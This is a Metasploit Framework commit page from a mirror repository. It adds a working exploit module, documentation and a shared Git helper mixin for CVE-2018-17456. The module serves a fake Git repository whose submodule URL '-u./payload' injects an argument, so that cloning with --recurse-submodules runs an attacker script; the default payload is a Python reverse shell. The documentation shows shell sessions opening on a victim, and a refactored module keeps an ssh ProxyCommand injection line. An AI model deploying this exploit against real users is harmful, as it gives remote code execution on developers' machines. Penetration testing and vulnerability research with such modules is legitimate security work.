infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10828, git submodule url exec CVE-2018-17456

GSoC/Meterpreter_Web_Console
Jacob Robles 2018-11-14 12:39:13 -06:00
parent 09a3748498 798d3156bc
commit 795aa3c99c
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
6 changed files with 267 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

87
documentation/modules/exploit/multi/http/git_submodule_url_exec.md Normal file
View File

@ -0,0 +1,87 @@
## Description
This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.
When a submodule url which starts with a dash e.g "-u./payload" is passed as an argument to git clone, the file "payload" inside the repository is executed.
This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised (e.g git clone --recurse-submodules URL)
## Vulnerable Application
Git can be installed on a variety of operating systems, however
newer versions will contain the patch for this vulnerability.
On OSX it can be installed with the XCode command line tools:
`xcode-select --install`
On Linux it can be installed with apt:
`sudo apt-get update && sudo apt-get install git`
You can check the version with `git --version`.
The fix is included in the following version:
2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
## Verification Steps
Example steps in this format:
1. Install the application
1. Start msfconsole
1. Do: `use exploit/multi/http/git_submodule_url_exec`
1. Do: `set LHOST [local host]`
1. Do: `exploit`
1. Clone the malicious Git URI and its submodules (e.g `git clone --recurse-submodules GIT_URL`)
1. You should get a shell
## Options
**GIT_URI**
This is the URI the git repository will be hosted from (defaults to random).
**GIT_SUBMODULE**
This is the URI of the submodule within the git repository (defaults to random).
The url of this submodule, when cloned, will execute the payload.
## Scenarios
```
msf5 > use exploit/multi/http/git_submodule_url_exec
msf5 exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf5 exploit(multi/http/git_submodule_url_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
msf5 exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ
[*] Local IP: http://192.168.0.1:8080/yaDlXuHVnRMMYGQ
[*] Server started.
[*] Malicious Git URI is http://192.168.0.1:8080/ogkvs.git
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:41034) at 2018-10-18 12:41:40 +0000
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:41036) at 2018-10-18 12:41:41 +0000
```
On the victim side:
```
git clone --recurse-submodules http://192.168.0.1:8080/ogkvs.git
Cloning into 'ogkvs'...
Submodule 'lfr:lr' (-u./rDwoZ) registered for path 'lfr:lr'
Cloning into 'lr'...
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
Failed to clone 'lfr:lr'. Retry scheduled
Cloning into 'lr'...
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
Failed to clone 'lfr:lr' a second time, aborting
```

38
lib/msf/core/exploit/git.rb Normal file
View File

@ -0,0 +1,38 @@
# -*- coding: binary -*-
module Msf
# This mixin provides helper functions for building Git repositories
module Exploit::Git
# Generate a commit message using fake names and emails
def fake_commit_message
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
commit
end
# Build's a Git object
def build_object(type, content)
# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
header = "#{type} #{content.size}\0"
store = header + content
[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
end
# Returns the Git object path name that a file with the provided SHA1 will reside in
def get_path(sha1)
sha1[0...2] + '/' + sha1[2..40]
end
end
end

1
lib/msf/core/exploit/mixins.rb
View File

@ -68,6 +68,7 @@ require 'msf/core/exploit/afp'
require 'msf/core/exploit/realport'
require 'msf/core/exploit/sip'
require 'msf/core/exploit/tincd'
require 'msf/core/exploit/git'
# Telephony
require 'msf/core/exploit/dialup'

29
modules/exploits/multi/http/git_client_command_exec.rb
View File

@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Git
include Msf::Exploit::Powershell
def initialize(info = {})
@ -181,23 +182,12 @@ class MetasploitModule < Msf::Exploit::Remote
git_dir = '.' + variants.sample
sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
if datastore['VERBOSE']
vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
commit.each_line { |l| vprint_status(l.strip) }
end
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build HEAD
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@ -229,19 +219,6 @@ class MetasploitModule < Msf::Exploit::Remote
# TODO: finish building the fake repository
end
# Build's a Git object
def build_object(type, content)
# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
header = "#{type} #{content.size}\0"
store = header + content
[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
end
# Returns the Git object path name that a file with the provided SHA1 will reside in
def get_path(sha1)
sha1[0...2] + '/' + sha1[2..40]
end
def exploit
super
end

29
modules/exploits/multi/http/git_submodule_command_exec.rb
View File

@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Git
def initialize(info = {})
super(
@ -97,38 +98,12 @@ url = ssh://-oProxyCommand=#{payload_cmd}/
sha1, content = build_object('tree', tree)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
## build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end
# Build's a Git object
def build_object(type, content)
# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
header = "#{type} #{content.size}\0"
store = header + content
[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
end
# Returns the Git object path name that a file with the provided SHA1 will reside in
def get_path(sha1)
sha1[0...2] + '/' + sha1[2..40]
end
def exploit
super
end

136
modules/exploits/multi/http/git_submodule_url_exec.rb Normal file
View File

@ -0,0 +1,136 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Git
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Malicious Git HTTP Server For CVE-2018-17456',
'Description' => %q(
This module exploits CVE-2018-17456, which affects Git
versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.
When a submodule url which starts with a dash e.g "-u./payload" is passed
as an argument to git clone, the file "payload" inside the repository
is executed.
This module creates a fake git repository which contains a submodule
containing the vulnerability. The vulnerability is triggered when the
submodules are initialised (e.g git clone --recurse-submodules URL)
),
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2018-17456'],
['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ],
['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ],
['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],
],
'DisclosureDate' => 'Oct 05 2018',
'Targets' => [
['Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' => {'Compat' => {'PayloadType' => 'python'}}
}
]
],
'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'},
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
]
)
end
def setup
@repo_data = {
git: { files: {} }
}
setup_git
super
end
def setup_git
# URI must start with a /
unless git_uri && git_uri.start_with?('/')
fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
end
payload_content = "#!/bin/sh\n#{payload.raw} &"
payload_file = Rex::Text.rand_text_alpha(4..6)
submodule_path = datastore['GIT_SUBMODULE']
if submodule_path.blank?
submodule_path = Rex::Text.rand_text_alpha(2..6).downcase + ":" + Rex::Text.rand_text_alpha(2..6).downcase
end
unless submodule_path.include?":"
fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')
end
gitmodules = "[submodule \"#{submodule_path}\"]
path = #{submodule_path}
url = -u./#{payload_file}
"
sha1, content = build_object('blob', gitmodules)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
payloadsha1, content = build_object('blob', payload_content)
@repo_data[:git][:files]["/objects/#{get_path(payloadsha1)}"] = content
tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
tree += "100744 #{payload_file}\0#{[payloadsha1].pack('H*')}"
tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
sha1, content = build_object('tree', tree)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end
def primer
# add the git and mercurial URIs as necessary
hardcoded_uripath(git_uri)
git_url = URI.parse(get_uri).merge(git_uri)
print_status("Malicious Git URI is #{git_url}")
print_status("git clone --recurse-submodules #{git_url}")
end
# handles git clone
def on_request_uri(cli, req)
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
if @repo_data[:git][:files].key?(req_file)
vprint_status("Sending Git #{req_file}")
send_response(cli, @repo_data[:git][:files][req_file])
else
vprint_status("Git #{req_file} doesn't exist")
send_not_found(cli)
end
end
# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
def git_uri
return @git_uri if @git_uri
if datastore['GIT_URI'].blank?
@git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git'
else
@git_uri = datastore['GIT_URI']
end
end
end